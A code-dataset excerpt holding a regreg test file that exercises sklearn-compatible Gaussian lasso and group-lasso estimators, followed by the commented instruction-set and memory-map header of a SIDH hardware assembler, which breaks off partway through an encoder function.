e84c112cd6559c2a31921fbe9ae54f6bfe997787
| 6,840
|
py
|
Python
|
regreg/sklearn/tests/test_gaussian.py
|
vishalbelsare/regreg
|
d1b62cc43cdd83331f2b0817b0ae099d5ef97966
|
[
"BSD-2-Clause"
] | 11
|
2016-02-25T01:53:03.000Z
|
2020-11-30T00:59:46.000Z
|
regreg/sklearn/tests/test_gaussian.py
|
vishalbelsare/regreg
|
d1b62cc43cdd83331f2b0817b0ae099d5ef97966
|
[
"BSD-2-Clause"
] | 21
|
2015-09-17T19:18:09.000Z
|
2021-04-28T06:15:02.000Z
|
regreg/sklearn/tests/test_gaussian.py
|
vishalbelsare/regreg
|
d1b62cc43cdd83331f2b0817b0ae099d5ef97966
|
[
"BSD-2-Clause"
] | 8
|
2016-03-24T00:03:03.000Z
|
2019-08-25T23:40:42.000Z
|
import numpy as np
try:
from sklearn.model_selection import cross_validate
from sklearn.model_selection import GridSearchCV
from ..api import (gaussian,
gaussian_lagrange)
have_sklearn = True
except ImportError:
have_sklearn = False
from ...api import l1norm, group_lasso
from ...tests.decorators import set_seed_for_test
@np.testing.dec.skipif(not have_sklearn)
@set_seed_for_test()
def test_regression_gaussian():
    """Smoke-test the sklearn-style Gaussian estimator with an l1norm atom."""
    n, p = 100, 20
    X = np.random.standard_normal((n, p))
    y = np.random.standard_normal(n)
    atom = l1norm
    atom_args = {'shape': p, 'lagrange': 2 * np.sqrt(n)}
    # Basic fit plus cross-validation.
    lasso = gaussian(atom, atom_args)
    lasso.fit(X, y)
    print(cross_validate(lasso, X, y, cv=10))
    # Grid search over a few lagrange multipliers.
    params = {'atom_params': [{'shape': p,
                               'lagrange': alpha * 2 * np.sqrt(n)}
                              for alpha in [0.5, 1, 1.5]]}
    GridSearchCV(lasso, params, cv=3).fit(X, y)
    # Variant expecting an offset column stacked with the response.
    lasso_offset = gaussian(atom, atom_args,
                            offset=True)
    y_offset = np.array([y, np.random.standard_normal(n)]).T
    lasso_offset.fit(X, y_offset)
    # Variant with case weights; all-ones weights must reproduce the
    # unweighted coefficients (checked below with assert_allclose).
    lasso_weights = gaussian(atom, atom_args,
                             case_weights=True,
                             score_method='mean_deviance')
    y_weights = np.array([y, np.ones_like(y)]).T
    lasso_weights.fit(X, y_weights)
    np.testing.assert_allclose(lasso_weights._coefs, lasso._coefs)
    GridSearchCV(lasso_offset, params, cv=3).fit(X, y_offset)
    GridSearchCV(lasso_weights, params, cv=3).fit(X, y_weights)
    # Offset and case weights combined.
    lasso_both = gaussian(atom, atom_args,
                          offset=True,
                          case_weights=True,
                          score_method='R2')
    y_both = np.array([y, np.ones_like(y), y_offset[:, 1]]).T
    GridSearchCV(lasso_both, params, cv=3).fit(X, y_both)

    def atom_constructor(null_grad, **args):
        # Factory handed to gaussian_lagrange in place of the atom class.
        return l1norm(**args)

    # Elastic-net variant through the lagrange interface.
    lasso_enet = gaussian_lagrange(atom_constructor,
                                   atom_args,
                                   offset=True,
                                   enet_alpha=0.5,
                                   case_weights=True,
                                   score_method='R2')
    GridSearchCV(lasso_enet, params, cv=3).fit(X, y_both)
@np.testing.dec.skipif(not have_sklearn)
@set_seed_for_test()
def test_regression_group_lasso():
    """Smoke-test the sklearn-style Gaussian estimator with a group_lasso atom."""
    n, p = 100, 20
    X = np.random.standard_normal((n, p))
    y = np.random.standard_normal(n)
    atom = group_lasso
    atom_args = {'groups': [0] * 10 + [1] * 10, 'lagrange': 2 * np.sqrt(n)}
    # Basic fit plus cross-validation.
    estimator = gaussian(atom, atom_args)
    estimator.fit(X, y)
    print(cross_validate(estimator, X, y, cv=10))
    # Grid search over a few lagrange multipliers.
    params = {'atom_params': [{'groups': [0] * 10 + [1] * 10,
                               'lagrange': alpha * 2 * np.sqrt(n)}
                              for alpha in [0.5, 1, 1.5]]}
    GridSearchCV(estimator, params, cv=3).fit(X, y)
    # Variant expecting an offset column stacked with the response.
    estimator_offset = gaussian(atom, atom_args,
                                offset=True)
    y_offset = np.array([y, np.random.standard_normal(n)]).T
    estimator_offset.fit(X, y_offset)
    # Variant with case weights; all-ones weights must reproduce the
    # unweighted coefficients (checked below with assert_allclose).
    estimator_weights = gaussian(atom, atom_args,
                                 case_weights=True,
                                 score_method='mean_deviance')
    y_weights = np.array([y, np.ones_like(y)]).T
    estimator_weights.fit(X, y_weights)
    np.testing.assert_allclose(estimator_weights._coefs, estimator._coefs)
    GridSearchCV(estimator_offset, params, cv=3).fit(X, y_offset)
    GridSearchCV(estimator_weights, params, cv=3).fit(X, y_weights)
    # Offset and case weights combined.
    estimator_both = gaussian(atom, atom_args,
                              offset=True,
                              case_weights=True,
                              score_method='R2')
    y_both = np.array([y, np.ones_like(y), y_offset[:, 1]]).T
    GridSearchCV(estimator_both, params, cv=3).fit(X, y_both)

    def atom_constructor(null_grad, **args):
        # Factory handed to gaussian_lagrange in place of the atom class.
        return group_lasso(**args)

    # Elastic-net variant through the lagrange interface.
    estimator_enet = gaussian_lagrange(atom_constructor,
                                       atom_args,
                                       offset=True,
                                       enet_alpha=0.5,
                                       case_weights=True,
                                       score_method='R2')
    GridSearchCV(estimator_enet, params, cv=3).fit(X, y_both)
@np.testing.dec.skipif(not have_sklearn)
@set_seed_for_test()
def test_regression_gaussian_bound():
    """Smoke-test the Gaussian estimator with an l1norm atom in bound form."""
    n, p = 100, 20
    X = np.random.standard_normal((n, p))
    y = np.random.standard_normal(n)
    atom = l1norm
    atom_args = {'shape': p, 'bound': 3}
    # Basic fit plus cross-validation.
    fitted = gaussian(atom,
                      atom_args)
    fitted.fit(X, y)
    print(cross_validate(fitted, X, y, cv=10))
    # Grid search over a few bound values.
    params = {'atom_params': [{'shape': p,
                               'bound': b,
                               } for b in [3, 4, 5]]}
    GridSearchCV(fitted, params, cv=3).fit(X, y)
    # Variant expecting an offset column stacked with the response.
    fitted_offset = gaussian(atom,
                             atom_args,
                             offset=True)
    y_offset = np.array([y, np.random.standard_normal(n)]).T
    fitted_offset.fit(X, y_offset)
    # Variant with case weights; all-ones weights must reproduce the
    # unweighted coefficients (checked below with assert_allclose).
    fitted_weights = gaussian(atom,
                              atom_args,
                              case_weights=True,
                              score_method='mean_deviance')
    y_weights = np.array([y, np.ones_like(y)]).T
    fitted_weights.fit(X, y_weights)
    np.testing.assert_allclose(fitted_weights._coefs, fitted._coefs)
    GridSearchCV(fitted_offset, params, cv=3).fit(X, y_offset)
    GridSearchCV(fitted_weights, params, cv=3).fit(X, y_weights)
    # Offset and case weights combined.
    fitted_both = gaussian(atom,
                           atom_args,
                           offset=True,
                           case_weights=True,
                           score_method='R2')
    y_both = np.array([y, np.ones_like(y), y_offset[:, 1]]).T
    GridSearchCV(fitted_both, params, cv=3).fit(X, y_both)
| 37.377049
| 94
| 0.557456
| 836
| 6,840
| 4.29067
| 0.104067
| 0.166713
| 0.03206
| 0.066908
| 0.926122
| 0.908837
| 0.902147
| 0.902147
| 0.902147
| 0.902147
| 0
| 0.018214
| 0.333772
| 6,840
| 182
| 95
| 37.582418
| 0.768927
| 0.005117
| 0
| 0.797101
| 0
| 0
| 0.022951
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 1
| 0.036232
| false
| 0
| 0.050725
| 0.014493
| 0.101449
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8810dbfee67b7a4d80c9f6cecbf412b0bc1b995
| 135,532
|
py
|
Python
|
assembler/assembler_v128.py
|
pmassolino/hw-sike
|
1fee8af81dcc3d0dcc57bc656e06acc6adf810a1
|
[
"CC0-1.0"
] | 7
|
2020-01-15T13:36:37.000Z
|
2021-04-10T02:54:28.000Z
|
assembler/assembler_v128.py
|
pmassolino/hw-sike
|
1fee8af81dcc3d0dcc57bc656e06acc6adf810a1
|
[
"CC0-1.0"
] | null | null | null |
assembler/assembler_v128.py
|
pmassolino/hw-sike
|
1fee8af81dcc3d0dcc57bc656e06acc6adf810a1
|
[
"CC0-1.0"
] | null | null | null |
#
# Register
# Dir 0 - Direct access
# ---- ---- Value between 0 to 255
# Dir 1 - Indirect access
# 00000 0000 Disable operand
# 00000 0001 Reserved
# 00--- ---- Reserved
# 10000 0000 RD0
# 10000 0001 RD1
# 10000 0010 RD2
# 10000 0011 RD3
# 10000 0100 RD4
# 10000 0101 RD5
# 10000 0110 RD6
# 10000 0111 RD7
# 10000 1000 RD8
# 10000 1001 RD9
# 10000 1010 RD10
# 10000 1011 RD11
# 10000 1100 RD12
# 10000 1101 RD13
# 10000 1110 RD14
# 10000 1111 RD15
# 10001 0000 RD16
# ...
# 10010 0000 RD32
# ...
# 100 11 1111 RD63
# 10100 ---- Reserved
# -- RDO 1 MSB bit
# 11000 0010 (RD3 if RD0 = 1 else RD2)
# 11000 0011 (RD2 if RD0 = 1 else RD3)
# 11000 0100 (RD5 if RD0 = 1 else RD4)
# 11000 0101 (RD4 if RD0 = 1 else RD5)
# 11000 0110 (RD7 if RD0 = 1 else RD6)
# 11000 0111 (RD6 if RD0 = 1 else RD7)
# 11000 1010 (RD9 if RD0 = 1 else RD8)
# 11000 1011 (RD8 if RD0 = 1 else RD9)
# 11000 1100 (RD11 if RD0 = 1 else RD10)
# 11000 1101 (RD10 if RD0 = 1 else RD11)
# 11000 1110 (RD13 if RD0 = 1 else RD12)
# 11000 1111 (RD12 if RD0 = 1 else RD13)
# NOTE(review): the two encodings below repeat bit patterns 1110/1111, which
# already map to RD12/RD13 two lines above — likely a copy-paste error;
# confirm the intended bit patterns for the RD14/RD15 pair.
# 11000 1110 (RD15 if RD0 = 1 else RD14)
# 11000 1111 (RD14 if RD0 = 1 else RD15)
# 11001 ---- Reserved
# -- RDO 1 LSB bit
# 11100 0010 (RD3 if RD0 = 1 else RD2)
# 11100 0011 (RD2 if RD0 = 1 else RD3)
# 11100 0100 (RD5 if RD0 = 1 else RD4)
# 11100 0101 (RD4 if RD0 = 1 else RD5)
# 11100 0110 (RD7 if RD0 = 1 else RD6)
# 11100 0111 (RD6 if RD0 = 1 else RD7)
# 11100 1010 (RD9 if RD0 = 1 else RD8)
# 11100 1011 (RD8 if RD0 = 1 else RD9)
# 11100 1100 (RD11 if RD0 = 1 else RD10)
# 11100 1101 (RD10 if RD0 = 1 else RD11)
# 11100 1110 (RD13 if RD0 = 1 else RD12)
# 11100 1111 (RD12 if RD0 = 1 else RD13)
# NOTE(review): as in the MSB table above, these repeat 1110/1111 (already
# used for RD12/RD13) — confirm the intended encodings for RD14/RD15.
# 11100 1110 (RD15 if RD0 = 1 else RD14)
# 11100 1111 (RD14 if RD0 = 1 else RD15)
# 11101 ---- Reserved
#
# Instructions model
#
# | 63 62 | 61 | 60 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | type | Dir memo | Sign Dir Cx memb | Sign Dir Cx mema |
#
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | type | Dir Mo | 0 Dir En Mb | Sign Dir En Ma |
#
#
# SIDH core instructions (00)
#
# If Cx = 0
# memx = 16 bits constant
# Cx = 1
# memx = 16 bits memory position
#
# #constant
# constant = direct number
# #(n)constant
# n*constant = multiplied factor, n is a number, only works if it can be solved by the compiler.
#
# NOP - Do nothing and goes to the next instruction.
# nop
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000000 | 0 0 | 0 0 0 0 | 0 0 0 0 |
#
# Jump - Jump to the specified position, memo -> PC
# Local bus memory
# OOOO = #constant
# jump OOOO
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000001 | 0 memo | 0 0 0 0 | 0 0 0 0 |
#
# Jump - Jump if equal to the specified position, memo -> PC if memb = mema
# Local bus memory
# OOOO = #constant
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# jumpeq OOOO YYYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000001 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Jump - Jump if less to the specified position, memo -> PC if mema > memb
#        (NOTE(review): the name says "less" but the condition reads
#        mema > memb — confirm the intended operand order/comparison)
# Local bus memory
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# unsigned values
# jumpl OOOO YYYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000010 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
# signed values
# jumpls OOOO YYYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000010 | 0 memo | 1 0 Cx memb | 1 0 Cx mema |
#
# Jump - Jump if equal or less to the specified position, memo -> PC if mema > memb
# Local bus memory
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# unsigned values
# jumpeql OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000011 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
# signed values
# jumpeqls OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000011 | 0 memo | 1 0 Cx memb | 1 0 Cx mema |
#
# Push Memory map position a in mac ram -> Stack
# Full bus memory
# OOOO = #constant
# OOOO = bXXXX
# OOOO = rdXX
# OOOO = rpc
# OOOO = rstatus
# OOOO = roperands
# OOOO = rprimeline
# push OOOO
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000100 | 0 0 | 0 0 0 0 | 0 Dir Cx mema |
#
# Pop Stack -> Memory map position o in mac ram
# Full bus memory
# OOOO = bXXXX
# OOOO = rdXX
# OOOO = rpc
# OOOO = rstatus
# OOOO = roperands
# OOOO = rprimeline
# pop OOOO
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000101 | Dir memo | 0 0 0 0 | 0 0 0 0 |
#
# Push Memory map position a in mac ram -> Stack
# Full bus memory
# pushf mXXX.X
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000110 | 0 0 | 0 0 0 0 | 0 Dir 1 mema |
#
# Pop Stack -> Memory map position o in mac ram
# Full bus memory
# popf mXXX.X
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000111 | Dir memo | 0 0 0 0 | 0 0 0 0 |
#
# Push Memory map position a in mac ram -> Stack
# Full bus memory
# pushm mXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001000 | 0 0 | 0 0 0 0 | 0 Dir 1 mema |
#
# Pop Stack -> Memory map position o in mac ram
# Full bus memory
# popm mXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001001 | Dir memo | 0 0 0 0 | 0 0 0 0 |
#
# Copy value mema -> memb
# Local bus memory
# copy memo mema
# OOOO = bXXXX
# OOOO = mXXX.X.XX
# OOOO = rdXX
# YYYY = #constant
# YYYY = bXXXX
# YYYY = mXXX.X.XX
# YYYY = rdXX
# YYYY = rpc
# YYYY = rstatus
# YYYY = roperands
# YYYY = rprimeline
# copy OOOO YYYY
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001010 | Dir memo | 0 0 0 0 | 0 Dir Cx mema |
#
# Copy value mema -> memb
# Full bus memory
# copyf memo mema
# OOOO = mXXX.X
# YYYY = mXXX.X
# copyf OOOO YYYY
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001011 | Dir memo | 0 0 0 0 | 0 Dir 1 mema |
#
# Copy value mema -> memb
# Full bus memory
# copym memo mema
# OOOO = mXXX.0
# YYYY = mXXX.0
# copym OOOO YYYY
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001100 | Dir memo | 0 0 0 0 | 0 Dir 1 mema |
#
# Load value mac memory
# Full bus memory
# lconstf mXXX.X #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001101 | Dir memo | 0 0 0 0 | Sign 0 0 value |
#
# Load value mac memory
# Full bus memory
# lconstm mXXX.0 #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001110 | Dir memo | 0 0 0 0 | Sign 0 0 value |
#
# Call function
# stack <- pc+1
# pc <- #constant
# OOOO = #constant
# OOOO = rdOO
# call OOOO
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001111 | 0 memo | 0 0 0 0 | 0 0 1 pc |
#
# Return function
# pc <- stack
# ret
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 010000 | 0 0 | 0 0 0 0 | 0 0 1 stack |
#
# Keccak Init - Initialize keccak core
# keccak_init
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 010010 | 0 0 | 0 0 0 0 | 0 0 0 0 |
#
# Keccak Go - Perform 24 rounds of Keccak
# keccak_go
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 010011 | 0 0 | 0 0 0 0 | 0 0 0 0 |
#
# Copy array mema -> memb
# Local bus memory
# copya inc|dec (r|d|s|ds) memo mema
# OOOO = bXXXX
# OOOO = mXXX.X.XX
# OOOO = rdXX
# YYYY = #constant
# YYYY = bXXXX
# YYYY = mXXX.X.XX
# YYYY = rdXX
# YYYY = rpc
# YYYY = rstatus
# YYYY = roperands
# YYYY = rprimeline
# copya inc|dec (r|d|s|ds) OOOO YYYY #size
# inc = 0, dec = 1
# Cd = Destiny constant (0 = constant)
# Cs = Source constant (0 = constant)
# | 63 62 | 61 | 60 ... 58 | 57 | 56 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 011 | inc/dec | Cd Cs | Dir memo | 0 0 0 size | 0 Dir Cx mema |
#
# Addition value memo = memb + mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# badd OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100000 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Subtraction value memo = memb - mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# bsub OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100001 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Multiplication value single memo = memb * mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# bsmul OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100010 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# bsmuls OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100010 | 0 memo | 1 0 Cx memb | 1 0 Cx mema |
#
# Shift right 17 bits value (memo) = (memb) >> consta
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# bshiftr OOOO YYYY #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100100 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Rotate right 17 bits value (memo) = (memb) >> consta
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# brotr OOOO YYYY #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100101 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Shift left 17 bits value (memo) = (memb) << consta
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# bshiftl OOOO YYYY #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100110 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Rotate left 17 bits value (memo) = (memb) << consta
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# brotl OOOO YYYY #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100111 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Logic and 17 bits value memo = memb AND mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# bland OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 101000 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Logic or 17 bits value memo = memb OR mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# blor OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 101001 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Logic xor 17 bits value memo = memb XOR mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# blxor OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 101010 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Logic NOT 17 bits value memo = NOT mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# blnot OOOO YYYY
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 101010 | 0 memo | 0 0 Cx memb | 0 0 0 1...1 |
#
# fin
# Finish execution
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 111111 | 0 0 | 0 0 0 0 | 0 0 0 0 |
#
#
# MAC Instructions (01)
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# BBBB = MBBB
# BBBB = RBB
# BBBB = IBB
# mmuld OOOO BBBB AAAA
# Multiplication Comba no reduction instruction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0000 | Dir Mo | 0 Dir En Mb | 0 Dir En Ma |
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# msqud OOOO AAAA
# Square Comba no reduction instruction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0001 | Dir Mo | 0 Dir En Ma | 0 Dir En Ma |
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# BBBB = MBBB
# BBBB = RBB
# BBBB = IBB
# mmulm OOOO BBBB AAAA
# mmulm OOOO BBBB AAAA
# Multiplication FIPS instruction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0010 | Dir Mo | 0 Dir En Mb | 0 Dir En Ma |
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# msqum OOOO AAAA
# msqum OOOO AAAA
# Square FIPS instruction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0011 | Dir Mo | 0 Dir En Ma | 0 Dir En Ma |
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# BBBB = MBBB
# BBBB = RBB
# BBBB = IBB
# madd_subd OOOO BBBB + AAAA
# madd_subd OOOO BBBB - AAAA
# Addition/Subtraction instruction - no reduction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0100 | Dir Mo | 0 Dir En Mb | Sign Dir En Ma |
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# BBBB = MBBB
# BBBB = RBB
# BBBB = IBB
# mitred OOOO AAAA
# Iterative modular reduction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0101 | Dir Mo | 0 0 0 0 | Sign Dir En Ma |
#
# Memory model
#
# R - Internal Read
# W - Internal Write
# E - External Read
# S - External Write
# ____________________________________
# |00000| MAC RAM |
# |07FFF|______________________________|
# ____________________________________
# |08000| Reserved |
# |0BFFF|______________________________|
# ____________________________________
# |0C000| ALU RAM |
# |0C3FF|______________________________|
# ____________________________________
# |0C400| Reserved |
# |0CFFF|______________________________|
# ____________________________________
# | | Keccak |
# |0D000| absorb |
# |0D07F| absorb |
# |0D080| squeeze |
# |0D0FF| squeeze |
# |0D100| dout |
# |0D1FF|______________________________|
# ____________________________________
# |0D200| Reserved |
# |0DFFF|______________________________|
# ____________________________________
# | | Status Regs |
# |0E000| PC Init |
# |0E001| Status |
# |0E002| Operands size |
# |0E003| Prime line = 1? |
# |0E004| Prime address |
# |0E005| Prime+1 address |
# |0E006| Prime' address |
# |0E007| Initial stack address |
# |0E008| Flag address |
# |0E009| Scalar init address |
# | | |
# |0EFFF| Reserved |
# |____________________________________|
# ____________________________________
# |0F000| Reserved |
# |0FFFF|______________________________|
#
#
# Special area. Only external communication
# ____________________________________
# |10000| Program |
# |17FFF|______________________________|
# ____________________________________
# |18000| Reserved |
# |1FFFF|______________________________|
#
import sys
import os
import tempfile
def instruction_nop(command, internal_labels, final_pass=True):
    """Encode the NOP instruction (core opcode 0000000): all 64 bits zero.

    The ``command`` tokens and ``internal_labels`` are accepted for a
    uniform encoder signature but are not used.  Returns the 64-character
    binary string and the instruction count (always 1).
    """
    # Field layout: processor(2) + type(7) + operand_o(17) + operand_b(19) + operand_a(19)
    fields = ('00', '0000000', '0' * 17, '0' * 19, '0' * 19)
    return ''.join(fields), 1
def instruction_jumpeq(command, internal_labels, final_pass=True):
    """Assemble 'jump' / 'jumpeq' (core opcode 0000001).

    jump OOOO            -- unconditional: memo -> PC
    jumpeq OOOO YYYY XXXX -- memo -> PC if memb == mema

    Each operand may be an internal label, '#constant', '#(n)constant'
    (constant pre-multiplied by n, resolved at assembly time), or an
